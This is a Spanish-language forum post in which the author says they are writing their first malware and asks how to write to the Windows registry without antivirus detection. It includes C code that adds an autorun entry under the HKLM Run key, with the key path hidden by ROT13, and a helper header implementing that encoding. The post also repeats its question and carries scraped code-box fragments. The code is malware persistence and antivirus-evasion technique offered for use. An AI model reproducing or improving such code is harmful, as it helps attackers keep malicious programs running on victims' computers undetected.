Estoy empezando a programar mi primer malware, y me he topado con un detalle al momento de escribir en el registro de windows, estoy usando una funcion muy vieja que encontre y es por eso que el antivirus me lo detecta muy rapido.
quisiera saber que metodos o formas de escribir en el registro puedo usar para no ser detectado ta rapido?
tengo entendido que se puede usar el cifrado XOR!
Tienen algun ejemplo?
Código: c
lib.h
Código: c
c++
quisiera saber que metodos o formas de escribir en el registro puedo usar para no ser detectado ta rapido?
tengo entendido que se puede usar el cifrado XOR!
Tienen algun ejemplo?
HKEY startup;
char key[256];
k(key,"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
RegCreateKeyEx(HKEY_LOCAL_MACHINE , key, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &startup, NULL);
RegSetValueEx(startup, regname, 0, REG_SZ, (BYTE *)installpath, strlen(installpath));
RegCloseKey(startup);
lib.h
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <string.h>
char k1(char c);
void k(char *buf, const char *in);
char *xstrchr(const char *str, char ch);
char k1(char c)
{
char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
char l[] = "abcdefghijklmnopqrstuvwxyz";
char *p;
if ((p = xstrchr(u, c)) != NULL)
return u[((p-u) + 13) % 26];
else if ((p = xstrchr(l, c)) != NULL)
return l[((p-l) + 13) % 26];
else
return c;
}
void k(char *buf, const char *in)
{
while (*in)
*buf++ = k1(*in++);
*buf = 0;
}
char *xstrchr(const char *str, char ch)
{
while (*str && *str != ch) str++;
return (*str == ch) ? (char *)str : NULL;
}
c++
